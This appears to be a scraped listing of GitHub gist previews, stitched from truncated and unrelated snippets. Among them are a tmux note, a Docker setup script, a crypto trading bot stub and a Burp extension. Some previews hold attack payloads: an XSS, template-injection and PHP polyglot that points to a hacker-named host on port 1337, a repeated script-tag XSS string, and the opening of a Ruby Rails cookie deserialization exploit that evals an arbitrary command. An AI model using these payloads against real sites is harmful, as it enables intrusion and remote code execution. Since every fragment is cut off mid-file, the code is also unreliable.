As configured in my dotfiles.
start new:
tmux
start new with session name:
#!/bin/bash | |
# update apt-get | |
export DEBIAN_FRONTEND="noninteractive" | |
sudo apt-get update | |
# remove previously installed Docker | |
sudo apt-get purge lxc-docker* | |
sudo apt-get purge docker.io* |
'>"/><svg/onload=prompt(1)>{{7*7}}http://hacker.blinkie.xyz:1337 <?php echo"HACKKED" ?> |
wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv* |
As configured in my dotfiles.
start new:
tmux
start new with session name:
import requests,json,bs4,time,threading,datetime,logging | |
from binance.client import Client | |
requests.packages.urllib3.disable_warnings() | |
from telegram.ext import Updater | |
from telegram.ext import CommandHandler | |
from telegram.ext.dispatcher import run_async | |
########### KEYS ####################### | |
updater = Updater(token='<TELEGRAM-TOKEN>') | |
dispatcher = updater.dispatcher |
${0 } | |
${0 == pageList.maxPage} | |
${1} | |
${1 eq currentPageNumber } | |
${5} | |
${5/6} | |
${a+1 } | |
${a.academyName} | |
${a.academyNumber} | |
${academyNumber==a.academyNumber} |
from burp import IBurpExtender,IProxyListener | |
class BurpExtender(IBurpExtender,IProxyListener): | |
def registerExtenderCallbacks(self,callbacks): | |
self._helpers = callbacks.getHelpers() | |
self._callbacks = callbacks | |
self._callbacks.setExtensionName("IProxyListener Params") | |
self._callbacks.registerProxyListener(self) | |
def processProxyMessage(self,messageIsRequest,message): |
[array('i', [143, 150]), | |
array('i', [207, 214]), | |
array('i', [753, 760]), | |
array('i', [931, 938]), | |
array('i', [1140, 1147]), | |
array('i', [1390, 1397]), | |
array('i', [1543, 1550]), | |
array('i', [1666, 1673]), | |
array('i', [1950, 1957]), | |
array('i', [4193, 4200]), |
nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt> |
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
require 'base64' | |
require 'openssl' | |
require 'optparse' | |
require 'open-uri' | |
SECRET_TOKEN = "SECRET HERE" | |
code = "eval('`COMMAND HERE`')" | |
marshal_payload = Base64.encode64( | |
"\x04\x08" + | |
"o" + |